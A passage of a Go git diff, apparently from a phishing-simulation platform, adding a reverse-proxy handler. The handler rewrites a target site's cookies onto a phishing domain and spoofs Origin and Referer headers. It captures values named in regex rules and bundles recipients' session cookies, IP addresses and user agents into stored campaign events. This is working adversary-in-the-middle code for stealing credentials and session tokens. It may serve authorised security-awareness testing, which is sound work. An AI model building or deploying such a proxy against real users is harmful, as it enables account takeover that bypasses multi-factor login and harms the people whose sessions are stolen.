session.RequiredCaptures.Range(func(key, value interface{}) bool { + if !value.(bool) { + allComplete = false + return false + } + return true + }) + session.IsComplete.Store(allComplete) + } + } +} + +func (m *ProxyHandler) checkAndSubmitCookieBundleWhenComplete(session *ProxySession, req *http.Request) { + if session.CampaignRecipientID == nil || session.CampaignID == nil { + return + } + + if session.CookieBundleSubmitted.Load() { + return + } + + // only submit cookie bundle when ALL captures (including non-cookie ones) are complete + // this ensures we capture the final state after all authentication attempts + if !session.IsComplete.Load() { + return + } + + // submit cookie bundle if there are cookie captures + cookieCaptures, requiredCookieCaptures := m.collectCookieCaptures(session) + if m.areAllCookieCapturesComplete(requiredCookieCaptures) && len(cookieCaptures) > 0 { + bundledData := m.createCookieBundle(cookieCaptures, session) + m.createCampaignSubmitEvent(session, bundledData, req) + session.CookieBundleSubmitted.Store(true) + } +} + +func (m *ProxyHandler) collectCookieCaptures(session *ProxySession) (map[string]map[string]string, map[string]bool) { + cookieCaptures := make(map[string]map[string]string) + requiredCookieCaptures := make(map[string]bool) + + session.RequiredCaptures.Range(func(requiredCaptureKey, requiredCaptureValue interface{}) bool { + requiredCaptureName := requiredCaptureKey.(string) + isComplete := requiredCaptureValue.(bool) + + session.Config.Range(func(hostKey, hostValue interface{}) bool { + hostConfig := hostValue.(service.ProxyServiceDomainConfig) + for _, capture := range hostConfig.Capture { + if capture.Name == requiredCaptureName && capture.From == "cookie" { + requiredCookieCaptures[requiredCaptureName] = isComplete + if capturedDataInterface, exists := session.CapturedData.Load(requiredCaptureName); exists { + cookieCaptures[requiredCaptureName] = capturedDataInterface.(map[string]string) + } + return false + } + } + return true + }) + return true + }) + + return cookieCaptures, requiredCookieCaptures +} + +func (m *ProxyHandler) areAllCookieCapturesComplete(requiredCookieCaptures map[string]bool) bool { + if len(requiredCookieCaptures) == 0 { + return false + } + + for _, isComplete := range requiredCookieCaptures { + if !isComplete { + return false + } + } + return true +} + +func (m *ProxyHandler) createCookieBundle(cookieCaptures map[string]map[string]string, session *ProxySession) map[string]interface{} { + bundledData := map[string]interface{}{ + "capture_type": "cookie", + "cookie_count": len(cookieCaptures), + "bundle_time": time.Now().Format(time.RFC3339), + "target_domain": session.TargetDomain, + "session_complete": true, + "cookies": make(map[string]interface{}), + } + + cookies := bundledData["cookies"].(map[string]interface{}) + for captureName, cookieData := range cookieCaptures { + cookies[captureName] = cookieData + } + + return bundledData +} + +func (m *ProxyHandler) applyRequestBodyReplacements(req *http.Request, session *ProxySession) { + if req.Body == nil { + return + } + + body := m.readRequestBody(req) + + session.Config.Range(func(key, value interface{}) bool { + hostConfig := value.(service.ProxyServiceDomainConfig) + for _, replacement := range hostConfig.Rewrite { + if replacement.From == "" || replacement.From == "request_body" { + body = m.applyReplacement(body, replacement, session.ID) + } + } + return true + }) + + req.Body = io.NopCloser(bytes.NewBuffer(body)) +} + +func (m *ProxyHandler) applyCustomReplacements(body []byte, session *ProxySession) []byte { + session.Config.Range(func(key, value interface{}) bool { + hostConfig := value.(service.ProxyServiceDomainConfig) + for _, replacement := range hostConfig.Rewrite { + if replacement.From == "" || replacement.From == "response_body" { + body = m.applyReplacement(body, replacement, session.ID) + } + } + return true + }) + return body +} + +// applyCustomReplacementsWithoutSession applies rewrite rules for requests without session context +func (m *ProxyHandler) applyCustomReplacementsWithoutSession(body []byte, config map[string]service.ProxyServiceDomainConfig, targetDomain string) []byte { + // apply rewrite rules from all host configurations (matches session behavior) + for _, hostConfig := range config { + for _, replacement := range hostConfig.Rewrite { + if replacement.From == "" || replacement.From == "response_body" { + body = m.applyReplacement(body, replacement, "no-session") + } + } + } + + return body +} + +func (m *ProxyHandler) applyReplacement(body []byte, replacement service.ProxyServiceReplaceRule, sessionID string) []byte { + re, err := regexp.Compile(replacement.Find) + if err != nil { + m.logger.Errorw("invalid replacement regex", "error", err) + return body + } + + oldContent := string(body) + content := re.ReplaceAllString(oldContent, replacement.Replace) + if content != oldContent { + return []byte(content) + } + return body +} + +func (m *ProxyHandler) processCookiesForPhishingDomain(resp *http.Response, ps *ProxySession) { + cookies := resp.Cookies() + if len(cookies) == 0 { + return + } + + phishDomain := ps.Domain.Name + targetDomain, err := m.getTargetDomainForPhishingDomain(phishDomain) + if err != nil { + m.logger.Errorw("failed to get target domain for cookie processing", "error", err, "phishDomain", phishDomain) + return + } + + tempConfig := map[string]service.ProxyServiceDomainConfig{ + targetDomain: {To: phishDomain}, + } + + resp.Header.Del("Set-Cookie") + for _, ck := range cookies { + m.adjustCookieSettings(ck, nil, resp) + m.rewriteCookieDomain(ck, tempConfig, resp) + resp.Header.Add("Set-Cookie", ck.String()) + } +} + +func (m *ProxyHandler) adjustCookieSettings(ck *http.Cookie, session *ProxySession, resp *http.Response) { + if ck.Secure { + ck.SameSite = http.SameSiteNoneMode + } else if ck.SameSite == http.SameSiteDefaultMode { + ck.SameSite = http.SameSiteLaxMode + } + + // handle cookie expiration parsing + if len(ck.RawExpires) > 0 && ck.Expires.IsZero() { + if exptime, err := time.Parse(time.RFC850, ck.RawExpires); err == nil { + ck.Expires = exptime + } else if exptime, err := time.Parse(time.ANSIC, ck.RawExpires); err == nil { + ck.Expires = exptime + } else if exptime, err := time.Parse("Monday, 02-Jan-2006 15:04:05 MST", ck.RawExpires); err == nil { + ck.Expires = exptime + } + } +} + +func (m *ProxyHandler) rewriteCookieDomain(ck *http.Cookie, config map[string]service.ProxyServiceDomainConfig, resp *http.Response) { + cDomain := ck.Domain + if cDomain == "" { + cDomain = resp.Request.Host + } else if cDomain[0] != '.' { + cDomain = "." + cDomain + } + + if phishHost := m.replaceHostWithPhished(strings.TrimPrefix(cDomain, "."), config); phishHost != "" { + if strings.HasPrefix(cDomain, ".") { + ck.Domain = "." + phishHost + } else { + ck.Domain = phishHost + } + } else { + ck.Domain = cDomain + } +} + +func (m *ProxyHandler) sameSiteToString(sameSite http.SameSite) string { + switch sameSite { + case http.SameSiteDefaultMode: + return "Default" + case http.SameSiteLaxMode: + return "Lax" + case http.SameSiteStrictMode: + return "Strict" + case http.SameSiteNoneMode: + return "None" + default: + return fmt.Sprintf("Unknown(%d)", int(sameSite)) + } +} + +func (m *ProxyHandler) getCampaignRecipientIDFromURLParams(req *http.Request) (*uuid.UUID, string) { + ctx := req.Context() + + campaignRecipient, paramName, err := server.GetCampaignRecipientFromURLParams( + ctx, + req, + m.IdentifierRepository, + m.CampaignRecipientRepository, + ) + if err != nil { + m.logger.Errorw("failed to get identifiers for URL param extraction", "error", err) + return nil, "" + } + + if campaignRecipient == nil { + return nil, "" + } + + campaignRecipientID := campaignRecipient.ID.MustGet() + return &campaignRecipientID, paramName +} + +// Header normalization methods +func (m *ProxyHandler) normalizeRequestHeaders(req *http.Request, session *ProxySession) { + configMap := m.configToMap(&session.Config) + + // fix origin header + if origin := req.Header.Get("Origin"); origin != "" { + if oURL, err := url.Parse(origin); err == nil { + if rHost := m.replaceHostWithOriginal(oURL.Host, configMap); rHost != "" { + oURL.Host = rHost + req.Header.Set("Origin", oURL.String()) + } + } + } + + // fix referer header + if referer := req.Header.Get("Referer"); referer != "" { + if rURL, err := url.Parse(referer); err == nil { + if rHost := m.replaceHostWithOriginal(rURL.Host, configMap); rHost != "" { + rURL.Host = rHost + req.Header.Set("Referer", rURL.String()) + } + } + } + + // prevent caching and fix headers + req.Header.Set("Cache-Control", "no-cache") + + if secFetchDest := req.Header.Get("Sec-Fetch-Dest"); secFetchDest == "iframe" { + req.Header.Set("Sec-Fetch-Dest", "document") + } + + if req.Body != nil && (req.Method == "POST" || req.Method == "PUT" || req.Method == "PATCH") { + if req.Header.Get("Content-Length") == "" && req.ContentLength > 0 { + req.Header.Set("Content-Length", fmt.Sprintf("%d", req.ContentLength)) + } + } +} + +func (m *ProxyHandler) readAndDecompressBody(resp *http.Response) ([]byte, bool, error) { + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, false, err + } + + encoding := resp.Header.Get("Content-Encoding") + switch strings.ToLower(encoding) { + case "gzip": + gzipReader, err := gzip.NewReader(bytes.NewBuffer(body)) + if err != nil { + return body, false, err + } + defer gzipReader.Close() + decompressed, err := io.ReadAll(gzipReader) + if err != nil { + return body, false, err + } + return decompressed, true, nil + case "deflate": + deflateReader := flate.NewReader(bytes.NewBuffer(body)) + defer deflateReader.Close() + decompressed, err := io.ReadAll(deflateReader) + if err != nil { + return body, false, err + } + return decompressed, true, nil + case "br": + return body, false, nil + default: + return body, false, nil + } +} + +func (m *ProxyHandler) updateResponseBody(resp *http.Response, body []byte, wasCompressed bool) { + if wasCompressed { + encoding := resp.Header.Get("Content-Encoding") + switch strings.ToLower(encoding) { + case "gzip": + var compressedBuffer bytes.Buffer + gzipWriter := gzip.NewWriter(&compressedBuffer) + if _, err := gzipWriter.Write(body); err != nil { + m.logger.Errorw("failed to write gzip compressed body", "error", err) + } + if err := gzipWriter.Close(); err != nil { + m.logger.Errorw("failed to close gzip writer", "error", err) + } + body = compressedBuffer.Bytes() + case "deflate": + var compressedBuffer bytes.Buffer + deflateWriter, err := flate.NewWriter(&compressedBuffer, flate.DefaultCompression) + if err != nil { + m.logger.Errorw("failed to create deflate writer", "error", err) + break + } + if _, err := deflateWriter.Write(body); err != nil { + m.logger.Errorw("failed to write deflate compressed body", "error", err) + } + if err := deflateWriter.Close(); err != nil { + m.logger.Errorw("failed to close deflate writer", "error", err) + } + body = compressedBuffer.Bytes() + } + } + + resp.Body = io.NopCloser(bytes.NewReader(body)) + resp.ContentLength = int64(len(body)) + resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(body))) +} + +func (m *ProxyHandler) shouldProcessContent(contentType string) bool { + processTypes := []string{"text/html", "application/javascript", "application/x-javascript", "text/javascript", "text/css", "application/json"} + for _, pType := range processTypes { + if strings.Contains(contentType, pType) { + return true + } + } + return false +} + +func (m *ProxyHandler) handleImmediateCampaignRedirect(session *ProxySession, resp *http.Response, req *http.Request, captureLocation string) { + m.handleCampaignFlowProgression(session, req) + + nextPageType := session.NextPageType.Load().(string) + if nextPageType == "" { + return + } + + redirectURL := m.buildCampaignFlowRedirectURL(session, nextPageType) + if redirectURL == "" { + return + } + + resp.StatusCode = 302 + resp.Status = "302 Found" + resp.Header.Set("Location", redirectURL) + resp.Header.Set("Content-Length", "0") + resp.Header.Set("Cache-Control", "no-cache, no-store, must-revalidate") + resp.Body = io.NopCloser(bytes.NewReader([]byte{})) + session.NextPageType.Store("") +} + +func (m *ProxyHandler) handleCampaignFlowProgression(session *ProxySession, req *http.Request) { + if session.CampaignRecipientID == nil || session.CampaignID == nil { + return + } + + ctx := req.Context() + templateID, err := session.Campaign.TemplateID.Get() + if err != nil { + m.logger.Errorw("failed to get template ID for campaign flow progression", "error", err) + return + } + + cTemplate, err := m.CampaignTemplateRepository.GetByID(ctx, &templateID, &repository.CampaignTemplateOption{}) + if err != nil { + m.logger.Errorw("failed to get campaign template for flow progression", "error", err, "templateID", templateID) + return + } + + currentPageType := m.getCurrentPageType(req, cTemplate, session) + nextPageType := m.getNextPageType(currentPageType, cTemplate) + + if nextPageType != data.PAGE_TYPE_DONE && nextPageType != currentPageType && session.IsComplete.Load() { + session.NextPageType.Store(nextPageType) + } +} + +func (m *ProxyHandler) getCurrentPageType(req *http.Request, template *model.CampaignTemplate, session *ProxySession) string { + if template.StateIdentifier != nil { + stateParamKey := template.StateIdentifier.Name.MustGet() + encryptedParam := req.URL.Query().Get(stateParamKey) + if encryptedParam != "" && session.CampaignID != nil { + secret := utils.UUIDToSecret(session.CampaignID) + if decrypted, err := utils.Decrypt(encryptedParam, secret); err == nil { + return decrypted + } + } + } + + if template.URLIdentifier != nil { + urlParamKey := template.URLIdentifier.Name.MustGet() + campaignRecipientIDParam := req.URL.Query().Get(urlParamKey) + if campaignRecipientIDParam != "" { + if _, errPage := template.BeforeLandingPageID.Get(); errPage == nil { + return data.PAGE_TYPE_BEFORE + } + if _, errProxy := template.BeforeLandingProxyID.Get(); errProxy == nil { + return data.PAGE_TYPE_BEFORE + } + return data.PAGE_TYPE_LANDING + } + } + + return data.PAGE_TYPE_LANDING +} + +func (m *ProxyHandler) getNextPageType(currentPageType string, template *model.CampaignTemplate) string { + switch currentPageType { + case data.PAGE_TYPE_BEFORE: + return data.PAGE_TYPE_LANDING + case data.PAGE_TYPE_LANDING: + if _, errPage := template.AfterLandingPageID.Get(); errPage == nil { + return data.PAGE_TYPE_AFTER + } + if _, errProxy := template.AfterLandingProxyID.Get(); errProxy == nil { + return data.PAGE_TYPE_AFTER + } + return data.PAGE_TYPE_DONE + case data.PAGE_TYPE_AFTER: + return data.PAGE_TYPE_DONE + default: + return data.PAGE_TYPE_DONE + } +} + +func (m *ProxyHandler) shouldRedirectForCampaignFlow(session *ProxySession, req *http.Request) bool { + nextPageTypeStr := session.NextPageType.Load().(string) + return nextPageTypeStr != "" && nextPageTypeStr != data.PAGE_TYPE_DONE && session.IsComplete.Load() +} + +func (m *ProxyHandler) createCampaignFlowRedirect(session *ProxySession, resp *http.Response) *http.Response { + if resp == nil { + return nil + } + + nextPageTypeStr := session.NextPageType.Load().(string) + session.NextPageType.Store("") + + redirectURL := m.buildCampaignFlowRedirectURL(session, nextPageTypeStr) + if redirectURL == "" { + return resp + } + + redirectResp := &http.Response{ + Status: "302 Found", + StatusCode: 302, + Proto: resp.Proto, + ProtoMajor: resp.ProtoMajor, + ProtoMinor: resp.ProtoMinor, + Header: make(http.Header), + Body: io.NopCloser(bytes.NewReader([]byte{})), + Request: resp.Request, + } + + redirectResp.Header.Set("Location", redirectURL) + redirectResp.Header.Set("Content-Length", "0") + + return redirectResp +} + +func (m *ProxyHandler) buildCampaignFlowRedirectURL(session *ProxySession, nextPageType string) string { + if session.CampaignRecipientID == nil || session.Campaign == nil { + return "" + } + + templateID, err := session.Campaign.TemplateID.Get() + if err != nil { + m.logger.Errorw("failed to get template ID for redirect URL", "error", err) + return "" + } + + ctx := context.Background() + cTemplate, err := m.CampaignTemplateRepository.GetByID(ctx, &templateID, &repository.CampaignTemplateOption{ + WithDomain: true, + WithIdentifier: true, + }) + if err != nil { + m.logger.Errorw("failed to get campaign template for redirect URL", "error", err, "templateID", templateID) + return "" + } + + var targetURL string + var usesTemplateDomain bool + + switch nextPageType { + case data.PAGE_TYPE_LANDING: + if _, err := cTemplate.LandingPageID.Get(); err == nil { + usesTemplateDomain = true + } + case data.PAGE_TYPE_AFTER: + if _, err := cTemplate.AfterLandingPageID.Get(); err == nil { + usesTemplateDomain = true + } + default: + if redirectURL, err := cTemplate.AfterLandingPageRedirectURL.Get(); err == nil { + if url := redirectURL.String(); len(url) > 0 { + return url + } + } + } + + if usesTemplateDomain && cTemplate.Domain != nil { + domainName, err := cTemplate.Domain.Name.Get() + if err != nil { + m.logger.Errorw("failed to get domain name for redirect URL", "error", err) + return "" + } + + if urlPath, err := cTemplate.URLPath.Get(); err == nil { + targetURL = fmt.Sprintf("https://%s%s", domainName, urlPath.String()) + } else { + targetURL = fmt.Sprintf("https://%s/", domainName) + } + } else if session.Domain != nil { + targetURL = fmt.Sprintf("https://%s/", session.Domain.Name) + } + + if targetURL == "" { + return "" + } + + // add campaign parameters + if cTemplate.URLIdentifier != nil && cTemplate.StateIdentifier != nil { + urlParamKey := cTemplate.URLIdentifier.Name.MustGet() + stateParamKey := cTemplate.StateIdentifier.Name.MustGet() + secret := utils.UUIDToSecret(session.CampaignID) + encryptedPageType, err := utils.Encrypt(nextPageType, secret) + if err != nil { + m.logger.Errorw("failed to encrypt page type for redirect URL", "error", err, "pageType", nextPageType) + return "" + } + separator := "?" + if strings.Contains(targetURL, "?") { + separator = "&" + } + + targetURL = fmt.Sprintf("%s%s%s=%s&%s=%s", + targetURL, separator, urlParamKey, session.CampaignRecipientID.String(), + stateParamKey, encryptedPageType, + ) + } + + return targetURL +} + +func (m *ProxyHandler) createCampaignSubmitEvent(session *ProxySession, capturedData interface{}, req *http.Request) { + if session.CampaignID == nil || session.CampaignRecipientID == nil { + return + } + + ctx := context.Background() + + // get campaign to check SaveSubmittedData setting + campaign, err := m.CampaignRepository.GetByID(ctx, session.CampaignID, &repository.CampaignOption{}) + if err != nil { + m.logger.Errorw("failed to get campaign for proxy capture event", "error", err) + return + } + + // save captured data only if SaveSubmittedData is enabled + var submittedDataJSON []byte + if campaign.SaveSubmittedData.MustGet() { + submittedDataJSON, err = json.Marshal(capturedData) + if err != nil { + m.logger.Errorw("failed to marshal captured data for campaign event", "error", err) + return + } + } else { + // save empty data but still record the capture event + submittedDataJSON = []byte("{}") + } + + submitDataEventID := cache.EventIDByName[data.EVENT_CAMPAIGN_RECIPIENT_SUBMITTED_DATA] + eventID := uuid.New() + + // get real client ip + clientIP := strings.SplitN(req.RemoteAddr, ":", 2)[0] + proxyHeaders := []string{"X-Forwarded-For", "X-Real-IP", "X-Client-IP", "Connecting-IP", "True-Client-IP", "Client-IP"} + for _, header := range proxyHeaders { + if headerValue := req.Header.Get(header); headerValue != "" { + clientIP = strings.SplitN(headerValue, ":", 2)[0] + break + } + } + + event := &model.CampaignEvent{ + ID: &eventID, + CampaignID: session.CampaignID, + RecipientID: session.RecipientID, + EventID: submitDataEventID, + Data: vo.NewOptionalString1MBMust(string(submittedDataJSON)), + IP: vo.NewOptionalString64Must(clientIP), + UserAgent: vo.NewOptionalString255Must(req.UserAgent()), + } + + err = m.CampaignRepository.SaveEvent(ctx, event) + if err != nil { + m.logger.Errorw("failed to create campaign submit event", "error", err) + } +} + +func (m *ProxyHandler) parseProxyConfig(configStr string) (*service.ProxyServiceConfigYAML, error) { + var yamlConfig service.ProxyServiceConfigYAML + err := yaml.Unmarshal([]byte(configStr), &yamlConfig) + if err != nil { + return nil, fmt.Errorf("failed to parse YAML config: %w", err) + } + + m.setProxyConfigDefaults(&yamlConfig) + + err = service.CompilePathPatterns(&yamlConfig) + if err != nil { + return nil, fmt.Errorf("failed to compile path patterns: %w", err) + } + + return &yamlConfig, nil +} + +func (m *ProxyHandler) setProxyConfigDefaults(config *service.ProxyServiceConfigYAML) { + if config.Version == "" { + config.Version = "0.0" + } + + for domain, domainConfig := range config.Hosts { + for i := range domainConfig.Capture { + if domainConfig.Capture[i].Required == nil { + trueValue := true + domainConfig.Capture[i].Required = &trueValue + } + } + config.Hosts[domain] = domainConfig + } +} + +func (m *ProxyHandler) ValidateProxyConfig(configStr string) (*service.ProxyServiceConfigYAML, error) { + config, err := m.parseProxyConfig(configStr) + if err != nil { + return nil, fmt.Errorf("failed to parse proxy config: %w", err) + } + + if err := service.ValidateVersion(config); err != nil { + return nil, fmt.Errorf("version validation failed: %w", err) + } + + for originalHost, hostConfig := range config.Hosts { + if hostConfig == nil || hostConfig.To == "" { + return nil, fmt.Errorf("domain mapping for '%s' is empty", originalHost) + } + + for i, capture := range hostConfig.Capture { + if capture.Name == "" { + return nil, fmt.Errorf("capture rule %d for '%s' has no name", i, originalHost) + } + if capture.Find == "" { + return nil, fmt.Errorf("capture rule '%s' for '%s' has no pattern", capture.Name, originalHost) + } + if _, err := regexp.Compile(capture.Find); err != nil { + return nil, fmt.Errorf("capture rule '%s' for '%s' has invalid regex: %w", capture.Name, originalHost, err) + } + } + + for i, replace := range hostConfig.Rewrite { + if replace.Name == "" { + return nil, fmt.Errorf("replace rule %d for '%s' has no name", i, originalHost) + } + if replace.Find == "" { + return nil, fmt.Errorf("replace rule '%s' for '%s' has no find pattern", replace.Name, originalHost) + } + if _, err := regexp.Compile(replace.Find); err != nil { + return nil, fmt.Errorf("replace rule '%s' for '%s' has invalid regex: %w", replace.Name, originalHost, err) + } + } + } + + return config, nil +} + +func (m *ProxyHandler) GetCookieName() string { + return m.cookieName +} + +func (m *ProxyHandler) IsValidProxyCookie(cookie string) bool { + return m.isValidSessionCookie(cookie) +} + +func (m *ProxyHandler) CleanupExpiredSessions() { + now := time.Now() + cleanedCount := 0 + + m.sessions.Range(func(key, value interface{}) bool { + sessionID, ok := key.(string) + if !ok { + return true + } + session, ok := value.(*ProxySession) + if !ok { + m.sessions.Delete(sessionID) + cleanedCount++ + return true + } + + sessionAge := now.Sub(session.CreatedAt) + if sessionAge > time.Duration(PROXY_COOKIE_MAX_AGE)*time.Second { + m.sessions.Delete(sessionID) + if session.CampaignRecipientID != nil { + m.campaignRecipientSessions.Delete(session.CampaignRecipientID.String()) + } + cleanedCount++ + } + return true + }) + +} + +func (m *ProxyHandler) getTargetDomainForPhishingDomain(phishingDomain string) (string, error) { + if strings.Contains(phishingDomain, ":") { + phishingDomain = strings.Split(phishingDomain, ":")[0] + } + + var dbDomain database.Domain + result := m.DomainRepository.DB.Where("name = ?", phishingDomain).First(&dbDomain) + if result.Error != nil { + return "", fmt.Errorf("failed to get domain configuration: %w", result.Error) + } + + if dbDomain.Type != "proxy" { + return "", fmt.Errorf("domain is not configured for proxy") + } + + if dbDomain.ProxyTargetDomain == "" { + return "", fmt.Errorf("no proxy target domain configured") + } + + targetDomain := dbDomain.ProxyTargetDomain + if strings.Contains(targetDomain, "://") { + if parsedURL, err := url.Parse(targetDomain); err == nil { + return parsedURL.Host, nil + } + } + + return targetDomain, nil +} + +func (m *ProxyHandler) isValidSessionCookie(cookie string) bool { + if cookie == "" { + return false + } + _, exists := m.sessions.Load(cookie) + return exists +} + +func (m *ProxyHandler) configToMap(configMap *sync.Map) map[string]service.ProxyServiceDomainConfig { + result := make(map[string]service.ProxyServiceDomainConfig) + configMap.Range(func(key, value interface{}) bool { + result[key.(string)] = value.(service.ProxyServiceDomainConfig) + return true + }) + return result +} + +func (m *ProxyHandler) createServiceUnavailableResponse(message string) *http.Response { + resp := &http.Response{ + StatusCode: http.StatusServiceUnavailable, + Status: "503 Service Unavailable", + Proto: "HTTP/1.1", + ProtoMajor: 1, + ProtoMinor: 1, + Header: make(http.Header), + Body: io.NopCloser(strings.NewReader(message)), + } + resp.Header.Set("Content-Type", "text/plain") + return resp +} + +func (m *ProxyHandler) writeResponse(w http.ResponseWriter, resp *http.Response) error { + // copy headers + for key, values := range resp.Header { + for _, value := range values { + w.Header().Add(key, value) + } + } + + // set status code + w.WriteHeader(resp.StatusCode) + + // copy body + _, err := io.Copy(w, resp.Body) + return err +} diff --git a/backend/random/generate.go b/backend/random/generate.go index d3f3cd6..9585c3f 100644 --- a/backend/random/generate.go +++ b/backend/random/generate.go @@ -38,3 +38,15 @@ func RandomIntN(n int) (int, error) { } return int(randNum.Int64()), nil } + +// GenerateRandomCookieName generates a random cookie name with length between 8-16 characters +func GenerateRandomCookieName() (string, error) { + // generate random length between 8 and 16 + length, err := RandomIntN(9) // 0-8, add 8 to get 8-16 + if err != nil { + return "", fmt.Errorf("failed to generate random cookie name length: %w", err) + } + length += 8 // now 8-16 + + return GenerateRandomURLBase64Encoded(length) +} diff --git a/backend/repository/campaignTemplate.go b/backend/repository/campaignTemplate.go index 82ca04d..3651362 100644 --- a/backend/repository/campaignTemplate.go +++ b/backend/repository/campaignTemplate.go @@ -35,14 +35,17 @@ type CampaignTemplateOption struct { UsableOnly bool - WithCompany bool - WithDomain bool - WithLandingPage bool - WithBeforeLandingPage bool - WithAfterLandingPage bool - WithEmail bool - WithSMTPConfiguration bool - WithAPISender bool + WithCompany bool + WithDomain bool + WithLandingPage bool + WithBeforeLandingPage bool + WithAfterLandingPage bool + WithLandingProxy bool + WithBeforeLandingProxy bool + WithAfterLandingProxy bool + WithEmail bool + WithSMTPConfiguration bool + WithAPISender bool // url and cookie keys WithIdentifier bool } @@ -107,6 +110,45 @@ func (r CampaignTemplate) load(o *CampaignTemplateOption, db *gorm.DB) *gorm.DB db = db.Preload("AfterLandingPage") } } + if o.WithLandingProxy { + if len(o.Columns) > 0 { + db = db.Joins(LeftJoinOnWithAlias( + database.CAMPAIGN_TEMPLATE_TABLE, + "landing_proxy_id", + database.PROXY_TABLE, + "id", + "landing_proxy", + )) + } else { + db = db.Preload("LandingProxy") + } + } + if o.WithBeforeLandingProxy { + if len(o.Columns) > 0 { + db = db.Joins(LeftJoinOnWithAlias( + database.CAMPAIGN_TEMPLATE_TABLE, + "before_landing_proxy_id", + database.PROXY_TABLE, + "id", + "before_landing_proxy", + )) + } else { + db = db.Preload("BeforeLandingProxy") + } + } + if o.WithAfterLandingProxy { + if len(o.Columns) > 0 { + db = db.Joins(LeftJoinOnWithAlias( + database.CAMPAIGN_TEMPLATE_TABLE, + "after_landing_proxy_id", + database.PROXY_TABLE, + "id", + "after_landing_proxy", + )) + } else { + db = db.Preload("AfterLandingProxy") + } + } if o.WithEmail { if len(o.Columns) > 0 { @@ -711,6 +753,18 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate if row.BeforeLandingPageID != nil { beforeLandingPageID.Set(*row.BeforeLandingPageID) } + var beforeLandingProxy *model.Proxy + if row.BeforeLandingProxy != nil { + m, err := ToProxy(row.BeforeLandingProxy) + if err != nil { + return nil, errs.Wrap(err) + } + beforeLandingProxy = m + } + beforeLandingProxyID := nullable.NewNullNullable[uuid.UUID]() + if row.BeforeLandingProxyID != nil { + beforeLandingProxyID.Set(*row.BeforeLandingProxyID) + } var landingPage *model.Page if row.LandingPage != nil { p, err := ToPage(row.LandingPage) @@ -723,6 +777,18 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate if row.LandingPageID != nil { landingPageID.Set(*row.LandingPageID) } + var landingProxy *model.Proxy + if row.LandingProxy != nil { + m, err := ToProxy(row.LandingProxy) + if err != nil { + return nil, errs.Wrap(err) + } + landingProxy = m + } + landingProxyID := nullable.NewNullNullable[uuid.UUID]() + if row.LandingProxyID != nil { + landingProxyID.Set(*row.LandingProxyID) + } var afterLandingPage *model.Page if row.AfterLandingPage != nil { p, err := ToPage(row.AfterLandingPage) @@ -735,6 +801,18 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate if row.AfterLandingPageID != nil { afterLandingPageID.Set(*row.AfterLandingPageID) } + var afterLandingProxy *model.Proxy + if row.AfterLandingProxy != nil { + m, err := ToProxy(row.AfterLandingProxy) + if err != nil { + return nil, errs.Wrap(err) + } + afterLandingProxy = m + } + afterLandingProxyID := nullable.NewNullNullable[uuid.UUID]() + if row.AfterLandingProxyID != nil { + afterLandingProxyID.Set(*row.AfterLandingProxyID) + } redirectURL := nullable.NewNullableWithValue(*vo.NewOptionalString255Must("")) if row.AfterLandingPageRedirectURL != "" { redirectURL.Set(*vo.NewOptionalString255Must(row.AfterLandingPageRedirectURL)) @@ -789,10 +867,16 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate Domain: domain, BeforeLandingPageID: beforeLandingPageID, BeforeLandingePage: beforeLandingPage, + BeforeLandingProxyID: beforeLandingProxyID, + BeforeLandingProxy: beforeLandingProxy, LandingPageID: landingPageID, LandingPage: landingPage, + LandingProxyID: landingProxyID, + LandingProxy: landingProxy, AfterLandingPageID: afterLandingPageID, AfterLandingPage: afterLandingPage, + AfterLandingProxyID: afterLandingProxyID, + AfterLandingProxy: afterLandingProxy, AfterLandingPageRedirectURL: redirectURL, EmailID: emailID, Email: email, @@ -808,3 +892,84 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate IsUsable: isUsable, }, nil } + +// RemoveProxyIDFromAll removes the proxy ID from any matching columns +// landing_proxy_id, before_landing_proxy_id and after_landing_proxy_id +// GetByProxyID gets campaign templates that use a specific proxy ID +func (r *CampaignTemplate) GetByProxyID( + ctx context.Context, + proxyID *uuid.UUID, + options *CampaignTemplateOption, +) ([]*model.CampaignTemplate, error) { + db := r.DB + if options.Columns != nil && len(options.Columns) > 0 { + db = db.Select(strings.Join(options.Columns, ",")) + } + db = r.load(options, db) + db, err := useQuery(db, database.CAMPAIGN_TEMPLATE_TABLE, options.QueryArgs, allowdCampaignTemplatesColumns...) + if err != nil { + return nil, errs.Wrap(err) + } + db = db.Where( + fmt.Sprintf( + "(%s = ? OR %s = ? OR %s = ?)", + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "before_landing_proxy_id"), + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "landing_proxy_id"), + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "after_landing_proxy_id"), + ), + proxyID.String(), + proxyID.String(), + proxyID.String(), + ) + if options.UsableOnly { + db = db.Where( + fmt.Sprintf( + "%s = ?", + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "is_usable"), + ), + true, + ) + } + var rows []*database.CampaignTemplate + res := db.Find(&rows) + if res.Error != nil { + return nil, res.Error + } + templates := []*model.CampaignTemplate{} + for _, row := range rows { + tmpl, err := ToCampaignTemplate(row) + if err != nil { + return nil, err + } + templates = append(templates, tmpl) + } + return templates, nil +} + +func (r *CampaignTemplate) RemoveProxyIDFromAll( + ctx context.Context, + proxyID *uuid.UUID, +) error { + columns := []string{"before_landing_proxy_id", "after_landing_proxy_id", "landing_proxy_id"} + for _, column := range columns { + row := map[string]any{} + AddUpdatedAt(row) + row[column] = nil + row["is_usable"] = false + res := r.DB. + Model(&database.CampaignTemplate{}). + Where( + fmt.Sprintf( + "%s = ?", + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, column), + ), + proxyID.String(), + ). + Updates(row) + + if res.Error != nil { + return res.Error + } + } + return nil +} diff --git a/backend/repository/domain.go b/backend/repository/domain.go index 4166fb8..f69ab42 100644 --- a/backend/repository/domain.go +++ b/backend/repository/domain.go @@ -257,12 +257,27 @@ func ToDomain(row *database.Domain) *model.Domain { if row.CompanyID != nil { companyID.Set(*row.CompanyID) } + proxyID := nullable.NewNullNullable[uuid.UUID]() + if row.ProxyID != nil { + proxyID.Set(*row.ProxyID) + } var company *model.Company if row.Company != nil { company = ToCompany(row.Company) } id := 